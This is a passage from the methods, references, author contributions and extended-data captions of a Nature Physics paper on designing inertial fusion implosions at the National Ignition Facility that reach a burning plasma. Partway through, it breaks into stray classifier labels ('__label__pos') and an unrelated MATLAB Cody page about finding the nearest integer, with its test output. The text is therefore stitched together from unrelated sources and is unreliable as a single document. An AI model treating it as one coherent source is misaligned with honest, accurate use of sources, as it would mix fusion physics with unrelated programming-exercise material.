HYBRID strategy1, we use data-driven models26 to predict the symmetry during this part of the pulse and to guide design choices such as the hohlraum size, laser-beam pointing, amount of energy in the outer beams during the early part of the pulse and so on. To additionally estimate the impact of wavelength detuning on implosion symmetry, we combine this data-driven model26 with an experimentally measured sensitivity of implosion symmetry to wavelength detuning 11. The numerical simulation methodology used for platform design (idealized conditions before the shot) and post-shot analysis (incorporating information from the experiment such as the delivered laser pulse and measured hohlraum and capsule dimensions) is performed in a two-step process. The radiation hydrodynamic simulations include multigroup radiation transport; non-local thermodynamic equilibrium (NLTE) atomic kinetics (required for modelling high-atomic-number hohlraums and capsule ablation) using detailed configuration accounting (LLNL 2010 DCA atomic models)43; three-dimensional ray tracing for laser-light interaction with the hohlraum wall and plasma as well as a detailed account of the transfer of energy between beams; detailed equation of state and opacity models; Monte Carlo transport of the fusion products; and electron thermal conduction from Livermore equation of state (LEOS) tables with a flux limiter of 0.15neTevTe, where ne is the electron density, Te is the electron temperature and vTe is the electron thermal velocity. First, lower-spatial-resolution integrated capsule and hohlraum simulations model the radiation drive with spatial, temporal and photon-energy resolution (Fig. 1). These simulations require the calibration of drive magnitude and symmetry during the peak of the pulse to match experimental measurements in separate focused or calibration experiments for each platform11,17,44. If some aspect of the design is changed, such as the size of the LEH, the calibrated models are used to extrapolate the plasma conditions. These calibration experiments can also be revisited with parameters closer to the modified design. The radiation drive is extracted from these lower-resolution integrated hohlraum and capsule simulations and imposed on higher-resolution capsule-only simulations45,46 in two dimensions with symmetry along the axis (Extended Data Fig. 4), which can resolve a larger number of modes (≤200). Also included are models for the engineering features in the target (capsule support, fill tube, roughness of the capsule and ice layer) as well as low-mode perturbations from the radiation flux asymmetries. The calculations for the four experiments in this paper use some combination of known perturbations, which may be different between the experiments, but under-predict the performance when all the known perturbations are applied. Thus, the choice of applied perturbations to match the level of observed neutron production may impact the relative agreement to other key metrics. Extended Data Fig. 4 shows a comparison of the simulated (middle) to measured fluence-compensated down-scattered neutron image47 (top), which provides a picture of the burn-averaged compressed dense shell surrounding the hot spot for the experiments in this paper. Although the three-dimensional features cannot be captured by two-dimensional simulations, the main features and sizes of the compressed shells are generally reproduced (Table 1) for a comparison with other implosion metrics. For example, the higher-density features at the poles for N210207 and N201122 are replicated by the simulations and low-density region at the north pole for N201101 since the as-shot laser asymmetry is captured by the simulations. The simulated images for density and temperature corresponding to these calculations at peak neutron production are shown in Extended Data Fig. 4, bottom. The visible simulated mode 4 perturbation in experiment N210207 is not a result of the capsule support tent model, but the applied roughness spectrum coupled with the low-mode radiation drive asymmetries. To calculate the amount of PdV work done on the hot spot, we track a constant mass that encompasses 98% of the neutron production at peak neutron emission. The pressure and change in volume of this mass (with volume weighting) are calculated to give the cumulative net PdV work on the hot spot, radiation loss from the hot spot and alpha heating of the hot spot as a function of time (Fig. 3). This hot-spot boundary is chosen to incorporate enough mass such that conduction losses may be neglected. We use the PdV work calculated at the time of peak neutron production for the simulations where alpha-particle heating is artificially turned off (‘burn off’). This is done so that the estimate of mechanical work done on the hot spot by the imploding fuel and shell is not influenced by alpha heating. Ratios of alpha-heating energies to the work done on the hot spot at ‘bang time’, and in total, are the main metrics for burning plasma. The yield amplification (Yamp) ratio of the neutron yield in simulations that allow alpha particles to redeposit energy to simulations in which this is artificially prohibited is another metric for the impact of alpha-particle heating on the implosion and burning plasma. The performance of HYBRID-E and I-Raum designs can be matched in two dimensions using a subset of the known degradations, and under-predict the performance when all the degradations are applied. To assess the impact of perturbation choice on the calculated yield amplification, various simulations of these designs including different perturbation choices or magnitude of perturbations were performed, for example, variations in surface roughness, tent model, fill tube model, low-mode asymmetries, capsule-thickness non-uniformities and mix model at the fuel–ablator interface. Extended Data Fig. 3 shows a clear trend in Yamp with total neutron yield for HYBRID-E (red) and I-Raum (blue) even for simulations with varying calculated down-scattered ratios, a measure of the areal density of the compressed shell. The red and blue lines in Extended Data Fig. 3 correspond to the total yields for the experiments in this paper, showing that all the four experiments are calculated to meet the yield amplification criteria for a burning plasma of >3.5. Other metrics for alpha-particle heating include the increase in simulated hot-spot mass, deuterium–tritium (DT) and deuterium–deuterium (DD) ion temperatures, hot-spot pressure and hot-spot internal energy compared with simulations where alpha-particle heating is artificially turned off (no-α) (Table 1). Future studies Future studies are aimed at continuing to optimize the key metrics from equation (1). Fielding smaller LEHs from the present value of 3.10–3.64 mm will improve the late-time ablation pressure by maintaining higher Tr later in time (lower radiation losses). In addition, smaller LEH hohlraums can achieve similar radiation temperatures to the designs in this work at lower power, which enables longer-duration pulses even with fixed available laser energy, further improving the late-time ablation pressure. The smaller LEH hohlraums can also be used to field thicker ablator implosions, for example, thickness of more than 4 μm at the inner-radius scale of 1,050 μm and thickness of more than 10 μm at the inner-radius scale of 1,100 μm, which is expected to improve the design stability and enable higher implosion velocities with similar levels of ablator mass remaining. Based on the modest levels of CBET presently needed to control symmetry, we expect achieving adequate symmetry in a smaller LEH hohlraum to be manageable. The impact of the thickness of the DT ice layer is also being investigated. Simulation studies that increased implosion convergence through reductions in the implosion adiabat, as well as controlling the tendency of more hydrodynamic instability, are also being performed. Finally, experiments to further increase the implosion scale by 5–30% and maintaining the other critical properties in equation (1) are underway. Data availability Raw data were generated at the National Ignition Facility and are not available to the general public. Derived data supporting the findings of this study are available from the corresponding authors upon request. Code availability The simulation codes used in this manuscript are not available to the general public. References 1. Hurricane, O. A. et al. Beyond alpha-heating: driving inertially confined fusion implosions toward a burning-plasma state on the National Ignition Facility. Plasma Phys. Control. Fusion 61, 014033 (2019). ADS  Google Scholar  2. Betti, R. et al. Alpha heating and burning plasmas in inertial confinement fusion. Phys. Rev. Lett. 114, 255003 (2015). ADS  Google Scholar  3. Hurricane, O. A. et al. Approaching a burning plasma on the NIF. Phys. Plasmas 26, 052704 (2019). ADS  Google Scholar  4. National Academies of Sciences, Engineering, and Medicine Final Report of the Committee on a Strategic Plan for U.S. Burning Plasma Research (National Academies Press, 2019). 5. Lindl, J. D., Haan, S. W., Landen, O. L., Christopherson, A. R. & Betti, R. Progress toward a self-consistent set of 1D ignition capsule metrics in ICF. Phys. Plasmas 25, 122704 (2018). ADS  Google Scholar  6. Christopherson, A. R. et al. Theory of ignition and burn propagation in inertial fusion implosions. Phys. Plasmas 27, 052708 (2020). ADS  Google Scholar  7. Atzeni, S. & Meyer-ter-Vehn, J. The Physics of Inertial Fusion: Beam Plasma Interaction, Hydrodynamics, Hot Dense Matter (Oxford Univ. Press, 2004). Google Scholar  8. Moses, E. The National Ignition Facility: an experimental platform for studying behavior of matter under extreme conditions. Astrophys. Space Sci. 336, 3–7 (2011). ADS  Google Scholar  9. Le Pape, S. et al. Fusion energy output greater than the kinetic energy of an imploding shell at the National Ignition Facility. Phys. Rev. Lett. 120, 245003 (2018). ADS  Google Scholar  10. Casey, D. T. et al. The high velocity, high adiabat, ‘Bigfoot’ campaign and tests of indirect-drive implosion scaling. Phys. Plasmas 25, 056308 (2018). ADS  Google Scholar  11. Kritcher, A. L. et al. Achieving record hot spot energies with large HDC implosions on NIF in HYBRID-E. Phys. Plasmas 28, 072706 (2021). ADS  Google Scholar  12. Kritcher, A. L. et al. Energy transfer between lasers in low-gas-fill-density hohlraums. Phys. Rev. E 98, 053206 (2018). ADS  Google Scholar  13. Zylstra, A. B. et al. Record energetics for an inertial fusion implosion at NIF. Phys. Rev. Lett. 126, 025001 (2021). ADS  Google Scholar  14. Kruer, W. L., Wilks, S. C., Afeyan, B. B. & Kirkwood, R. K. Energy transfer between crossing laser beams. Phys. Plasmas 3, 382–385 (1996). ADS  Google Scholar  15. Glenzer, S. H. et al. Symmetric inertial confinement fusion implosions at ultra-high laser energies. Science 327, 1228–1231 (2010). ADS  Google Scholar  16. Michel, P. et al. Tuning the implosion symmetry of ICF targets via controlled crossed-beam energy transfer. Phys. Rev. Lett. 102, 025004 (2009). ADS  Google Scholar  17. Robey, H. F., Berzak Hopkins, L., Milovich, J. L. & Meezan, N. B. The I-Raum: a new shaped hohlraum for improved inner beam propagation in indirectly-driven ICF implosions on the National Ignition Facility. Phys. Plasmas 25, 012711 (2018). ADS  Google Scholar  18. Zylstra, A. B. et al. Burning plasma achieved in inertial fusion. Nature https://doi.org/10.1038/s41586-021-04281-w (2022). 19. Ross, J. S. et al. Experiments conducted in the burning plasma regime with inertial fusion implosions. Preprint at https://arxiv.org/pdf/2111.04640 (2021). 20. Marinak, M. M. et al. Advances in HYDRA and its applications to simulations of inertial confinement fusion targets. EPJ Web Conf. 59, 06001 (2013). Google Scholar  21. Marinak, M. M. et al. Three-dimensional HYDRA simulations of National Ignition Facility targets. Phys. Plasmas 8, 2275–2280 (2001). ADS  Google Scholar  22. Kritcher, A. L. et al. Metrics for long wavelength asymmetries in inertial confinement fusion implosions on the National Ignition Facility. Phys. Plasmas 21, 042708 (2014). ADS  Google Scholar  23. Pak, A. et al. Impact of localized radiative loss on inertial confinement fusion implosions. Phys. Rev. Lett. 124, 145001 (2020). ADS  Google Scholar  24. Baker, K. L. et al. Fill tube dynamics in inertial confinement fusion implosions with high density carbon ablators. Phys. Plasmas 27, 112706 (2020). ADS  Google Scholar  25. Nagel, S. R. et al. Effect of the mounting membrane on shape in inertial confinement fusion implosions. Phys. Plasmas 22, 022704 (2015). ADS  Google Scholar  26. Callahan, D. A. et al. Exploring the limits of case-to-capsule ratio, pulse length, and picket energy for symmetric hohlraum drive on the National Ignition Facility Laser. Phys. Plasmas 25, 056305 (2018). ADS  Google Scholar  27. Ralph, J. E. et al. The influence of hohlraum dynamics on implosion symmetry in indirect drive inertial confinement fusion experiments. Phys. Plasmas 25, 082701 (2018). ADS  Google Scholar  28. Lindl, J. D. et al. Review of the national ignition campaign 2009–2012. Phys. Plasmas 21, 020501 (2014). ADS  Google Scholar  29. Hurricane, O. A. et al. Fuel gain exceeding unity in an inertially confined fusion implosion. Nature 506, 343–348 (2014). ADS  Google Scholar  30. Dewald, E. L. et al. Hot electron measurements in ignition relevant hohlraums on the National Ignition Facility. Rev. Sci. Instrum. 81, 10D938 (2010). Google Scholar  31. Kritcher, A. L. et al. Integrated modeling of cryogenic layered highfoot experiments at the NIF. Phys. Plasmas 23, 052709 (2016). ADS  Google Scholar  32. Berzak Hopkins, L. F. et al. First high-convergence cryogenic implosion in a near-vacuum hohlraum. Phys. Rev. Lett. 114, 175001 (2015). ADS  Google Scholar  33. Turnbull, D. et al. Symmetry control in subscale near-vacuum hohlraums. Phys. Plasmas 23, 052710 (2016). ADS  Google Scholar  34. Divol, L. et al. Symmetry control of an indirectly driven high-density-carbon implosion at high convergence and high velocity. Phys. Plasmas 24, 056309 (2017). ADS  Google Scholar  35. Clark, D. S. et al. Three-dimensional modeling and hydrodynamic scaling of National Ignition Facility implosions. Phys. Plasmas 26, 050601 (2019). ADS  Google Scholar  36. Hurricane, O. A. et al. On the importance of minimizing ‘coast-time’ in X-ray driven inertially confined fusion implosions. Phys. Plasmas 24, 092706 (2017). ADS  Google Scholar  37. Bishop, B. National Ignition Facility experiment puts researchers at threshold of fusion ignition. Lawrence Livermore National Laboratory https://www.llnl.gov/news/national-ignition-facility-experiment-puts-researchers-threshold-fusion-ignition (2021). 38. MacFarlane, J. J. VISRAD—A 3-D view factor code and design tool for high-energy density physics experiments. J. Quant. Spectrosc. Radiat. Transfer 81, 287–300 (2003). ADS  Google Scholar  39. Williams, O. A. & Nesládek, M. Growth and properties of nanocrystalline diamond films. Phys. Stat. Sol. A 203, 3375–3386 (2006). 40. Berzak Hopkins, L. et al. Increasing stagnation pressure and thermonuclear performance of inertial confinement fusion capsules by the introduction of a high-Z dopant. Phys. Plasmas 25, 080706 (2018). ADS  Google Scholar  41. Berzak Hopkins, L. et al. Toward a burning plasma state using diamond ablator inertially confined fusion (ICF) implosions on the National Ignition Facility (NIF). Plasma Phys. Control. Fusion 61, 014023 (2019). ADS  Google Scholar  42. Pickworth, L. A. et al. Application of cross-beam energy transfer to control drive symmetry in ICF implosions in low gas fill hohlraums at the National Ignition Facility. Phys. Plasmas 27, 102702 (2020). ADS  Google Scholar  43. Patel, M. V., Scott, H. A. & Marinak, M. M. The HYDRA DCA atomic kinetics package. In American Physical Society, 52nd Annual Meeting of the APS Division of Plasma Physics Vol. 52, NO5.008 (APS, 2010). 44. Jones, O. S. et al. A high-resolution integrated model of the National Ignition Campaign cryogenic layered experiments. Phys. Plasmas 19, 056315 (2012). ADS  Google Scholar  45. Clark, D. S. et al. Detailed implosion modeling of deuterium-tritium layered experiments on the National Ignition Facility. Phys. Plasmas 20, 056318 (2013). ADS  Google Scholar  46. Clark, D. S. et al. Capsule modeling of high foot implosion experiments on the National Ignition Facility. Plasma Phys. Control. Fusion 59, 055006 (2017). ADS  Google Scholar  47. Casey, D. T. et al. Fluence-compensated down-scattered neutron imaging using the neutron imaging system at the National Ignition Facility. Rev. Sci. Instrum. 87, 11E715 (2016). Google Scholar  Download references Acknowledgements We thank B. Coppi (MIT), S. C. Cowley (PPPL), D. Whyte (MIT), J. Hammer (LLNL), M. Farrell (GA) and J. Kline (LANL) for thoughtful discussions. The contributions of NIF operations and target fabrication teams to the success of these experiments are gratefully acknowledged. This work was performed under the auspices of the US Department of Energy by Lawrence Livermore National Laboratory under contract DE-AC52-07NA27344. This document was prepared as an account of work sponsored by an agency of the US government. Neither the US government nor Lawrence Livermore National Security, LLC, or any of their employees, makes any warranty, expressed or implied, or assumes any legal liability or responsibility for the accuracy, completeness or usefulness of any information, apparatus, product or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial product, process or service by trade name, trademark, manufacturer or otherwise does not necessarily constitute or imply its endorsement, recommendation or favouring by the US government or Lawrence Livermore National Security, LLC. The views and opinions of the authors expressed herein do not necessarily state or reflect those of the US government or Lawrence Livermore National Security, LLC, and shall not be used for advertising or product endorsement purposes. LLNL-JRNL-821690-DRAFT Author information Affiliations Authors Contributions A.L.K.: HYBRID-E design lead, integrated hohlraum group lead and wrote sections of paper. C.V.Y.: present I-Raum design lead and wrote sections of paper. H.F.R.: original I-Raum design lead. C.R.W.: capsule/instability physics. A.B.Z.: hot-spot analysis lead, HYBRID-E experimental lead. O.A.H.: capsule scale/burning plasma strategy, theory, zero-dimensional hot-spot models and wrote sections of paper. D.A.C.: empirical hohlraum P2 model and hohlraum strategy. J.E.R.: N201101 and N210207 experimentalist and shot responsible individual (shot RI). J.S.R.: I-Raum experimental lead and N201122 shot RI. K.L.B.: hybrid shot RI. D.T.C.: HYBRID shot RI. D.S.C.: capsule/instability physics. T.D.: HYBRID shot RI. L.D.: three-dimensional hot-spot analysis. M.H.: HYBRID shot RI. L.B.H.: HDC design and campaign lead. S.L.P.: HYBRID shot RI. N.B.M.: advanced hohlraum lead. A.P.: HYBRID and I-Raum shot RI as well as physics of capsule engineering defects. P.K.P.: one-dimensional hot-spot analysis as well as Yamp and GLC inference. R.T.: HYBRID shot RI. S.J.A.: capsule microstructure physics. P.A.A.: hohlraum physics. L.J.A.: engineering and targets. B.B.: penumbral X-ray diagnostic. D.B.: computational physics. L.R.B.: X-ray framing camera. R.B.: inertially confined fusion (ICF) physics/ignition theory. S.D.B.: cryo-layering. J.B.: diamond capsule fabrication and materials science. R.M.B.: real-time neutron activation detector’s nuclear diagnostic. N.W.B.: neutron diagnostics. E.J.B.: project engineering. D.K.B.: diagnostics. T.B.: capsule fabrication and metrology. T.M.B.: cryo-layering. M.W.B.: project engineering. P.M.C.: deuterium–tritium equation-of-state measurements. B.C.: HYDRA code development. T.C.: laser plasma instability physics. H.C.: gated laser entrance hole X-ray diagnostic. C.C.: target fabrication planning. A.R.C.: ignition theory. J.W.C.: capsule fabrication. E.L.D.: experiments. T.R.D.: capsule physics. M.J.E.: program management. W.A.F.: hohlraum physics. J.E.F.: 2DConA image analysis. D.F.: nuclear diagnostics. J.A.F.: magnetic recoil spectrometer nuclear diagnostic. J.A.G.: ensemble simulations. M.G.J.: magnetic recoil spectrometer diagnostic. S.H.G.: ICF physics. G.P.G.: nuclear diagnostics. S.H.: capsule physics and cryogenic deuterium–tritium ice-layer analysis. K.D.H.: neutron diagnostics. G.N.H.: experiments. B.A.H.: capsule physics. J.H.: computational physics. E.H.: nuclear time-of-flight diagnostics. J.E.H.: laser delivery quality control and improvements. V.J.H.: laser delivery quality control and improvements. H. Herrmann: gamma diagnostics. M.C.H.: programme management. D.E.H.: hohlraum physics and CBET studies in HYBRID-C. D.D.H.: capsule physics. J.P.H.: X-ray diagnostics. W.W.H.: management. H. Huang: capsule fabrication. K.D.H.: ensemble simulations. N.I.: X-ray diagnostics. L.C.J.: X-ray diagnostics. J.J.: neutron diagnostics. O.J.: hohlraum physics. G.D.K.: HYDRA code development. S.M.K.: neutron diagnostics. S.F.K.: X-ray diagnostics and analysis. J.K.: diagnostic management. Y.K.: gamma diagnostics. H.G.K.: gamma diagnostics. V.G.K.: neutron diagnostics. C.K.: capsules. J.M.K.: HYDRA code development. M.K.G.K.: ensemble simulations. J.J.K.: targets. B.K.: ensemble simulations. O.L.L.: velocity analysis. S.L.: laser–plasma instability (PF3D) code development. D.L.: NIF facility management. N.C.L.: optical diagnostics. J.D.L.: ICF physics. T.M.: ICF physics. M.J.M.: X-ray diagnostics. B.J.M.: mode 1 analysis and back-scatter. A.J.M.: diagnostic management. S.A.M.: integrated design physics. A.G.M.: X-ray diagnostics. M.M.M.: HYDRA code development lead. D.A.M.: X-ray diagnostics. E.V.M.: X-ray diagnostics. L.M.: capsule physics. K.M.: gamma diagnostics. P.A.M.: LPI physics. M.M.: optical diagnostics. J.L.M.: hohlraum physics. J.D.M.: hohlraum physics. A.S.M.: neutron diagnostics. J.W.M.: hohlraum physics. T.M.: neutron and gamma diagnostics. K.N.: project engineering. J.-M.G.D.N.: laser delivery quality control and improvements. A.N.: target fabrication engineering, capsule and fabrication planning. R.N.: simulations of ensembles. M.V.P.: HYDRA code development. L.J.P.: kaser delivery quality control and improvements. J.L.P.: simulations of ensembles. Y.P.: hohlraum physics. B.B.P.: hohlraum physics. M.R.: capsule fabrication. N.G.R.: capsule fabrication. H.R.: real-time neutron activation detector’s mode 1 analysis. M.R.: hohlraum physics. M.S.R.: X-ray diagnostics. J.D.S.: hohlraum physics. J.S.: mode 1 analysis. S.S.: capsules. D.J.S.: neutron diagnostics. M.B.S.: hohlraum diagnostics. C.R.S.: HYDRA code development. H.A.S.: NLTE opacities (Cretin) code development. S.M.S.: HYDRA code development. K.S.: mode 1 metrology. M.W.S.: kinetic physics. S.S.: sagometer data and particle analysis. V.A.S.: capsule physics. B.K.S.: ensemble simulations. P.T.S.: dynamic model and ignition theory. M.S.: capsules. S.S.: X-ray diagnostics. D.J.S.: hohlraum/LPI physics. L.J.S.: hohlraum physics. C.A.T.: Bigfoot design physics. R.P.J.T.: program management. C.T.: X-ray diagnostics. E.R.T.: optical diagnostics. P.L.V.: neutron imaging diagnostics. K.W.: X-ray diagnostics. C.W.: capsule fabrication. C.H.W.: neutron diagnostics. B.M.V.W.: NIF operations lead. D.T.W.: hohlraum physics. B.N.W.: project engineering. M.Y.: capsule fabrication. S.T.Y.: laser delivery quality control and improvements. G.B.Z.: computational physics lead. Corresponding authors Correspondence to A. L. Kritcher or C. V. Young. Ethics declarations Competing interests The authors declare no competing interests. Peer review Peer review information Nature Physics thanks Erik Lefebvre, Robbie Scott and the other, anonymous, reviewer(s) for their contribution to the peer review of this work. Additional information Publisher’s note Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. Extended data Extended Data Fig. 1 Radiation flux asymmetries. Calculated normalized Legendre decompositions of the radiation flux moments (P1/P0 in blue P2/P0 in red and P4/P0 in grey) as a function of time with a dashed horizontal line at the position of zero asymmetry. The incident cone fraction (ratio of inner power to total power) and laser power profiles shown below the radiation flux asymmetries for HYBRID-E (top) and I-Raum (bottom). The total laser power as a function of time is shown before (solid) and after (dashed) drive multi- pliers are applied to the pulse to match experimental data. Extended Data Fig. 2 Linear growth factors for high-mode perturbations. Ablation front growth factors (AFGF) (top) and fuel-ablator interface growth factors (FAGF) (bottom) as a function of mode number at peak implosion velocity for HYBRID-E (black) and I-Raum (red), showing a tradeoff in design stability at the two interfaces due to differences in the dopant layer thickness. The shaded bands show the growth factors at ± 50 ps from peak implosion velocity. Extended Data Fig. 3 Neutron yield amplification from alpha heating. Calculated Yield amplification, ratio of total yield as a result of alpha particle heating to yield from simulations where the alpha particle heating is artificially turned off for HYBRID-E (red) and I-Raum (blue) as a function of total yield. Each point is a high-resolution capsule simulation which applies different combinations of the known perturbations. The lines correspond to the total measured yields from the four experiments discussed in the main text (N201101, N201122, N210207, and N210220). Extended Data Fig. 4 Shell and hot spot configurations at peak neutron production. Each image is 200 × 200 μm with color scale(s) normalized to the maximum value(s) in that panel. Top row: Measured fluence-compensated down-scattered neutron images (FC-DSNI) for each shot. Red indicates regions of higher areal density and neutron scatter. Center row: Simulated FC-DSNI images from 2D radiation-hydrodynamic capsule-only simulations for each shot with known degradations, including the capsule support tent and fill tube (low mode mix), surface roughness (high mode mix), x-ray drive asymmetries, and as-fabricated shell non-uniformity. Bottom row: Simulated density (left) and ion temperature (right) maps at peak neutron production. The maximum (density, ion temperature) values for each panel, left to right, in (g/cc, keV) are: (350, 7.31), (450, 6.49), (350, 8.4), (450, 7.2). Extended Data Fig. 5 Target dimensions. Schematics of the HYBRID-E (a) and I-Raum designs (b) showing the nominal target dimensions for the hohlraums (left) and pie charts for the central DT-fuel filled capsules (right). The HDC ablator consists of a ~ 5 μm inner un-doped HDC layer, followed by a Tungsten (W) doped HDC layer at larger radii, and an outer un-doped HDC layer. See Extended Data Table 1 for additional design parameters. Extended Data Table 1 Implosion efficiency and symmetry optimization for example experiments in Fig. 2 Extended Data Table 2 Additional design parameters Rights and permissions Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons license, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons license, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons license and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/. Reprints and Permissions About this article Verify currency and authenticity via CrossMark Cite this article Kritcher, A.L., Young, C.V., Robey, H.F. et al. Design of inertial fusion implosions reaching the burning plasma regime. Nat. Phys. 18, 251–258 (2022). https://doi.org/10.1038/s41567-021-01485-9 Download citation • Received: • Accepted: • Published: • Issue Date: • DOI: https://doi.org/10.1038/s41567-021-01485-9 Further reading Search Quick links Nature Briefing Sign up for the Nature Briefing newsletter — what matters in science, free to your inbox daily. Get the most important science stories of the day, free in your inbox. Sign up for Nature Briefing
__label__pos
0.82028
Cody Problem 1278. Find the nearest integer Solution 3857788 Submitted on 26 Nov 2020 by Andrea Caruso This solution is locked. To view this solution, you need to provide a solution of the same size or smaller. Test Suite Test Status Code Input and Output 1   Pass x = [1:1:5]; a = 4.3; y_correct = 4; assert(isequal(nearestNumber(x,a),y_correct)) ans = 4 2   Pass x = [2 4 5 6 8 10]; a = 4.6; y_correct = 5; assert(isequal(nearestNumber(x,a),y_correct)) ans = 5 3   Pass x = [-2 -3 -1 0]; a = -3.1; y_correct = -3; assert(isequal(nearestNumber(x,a),y_correct)) ans = -3 Suggested Problems More from this Author16 Community Treasure Hunt Find the treasures in MATLAB Central and discover how the community can help you! Start Hunting!
__label__pos
0.961191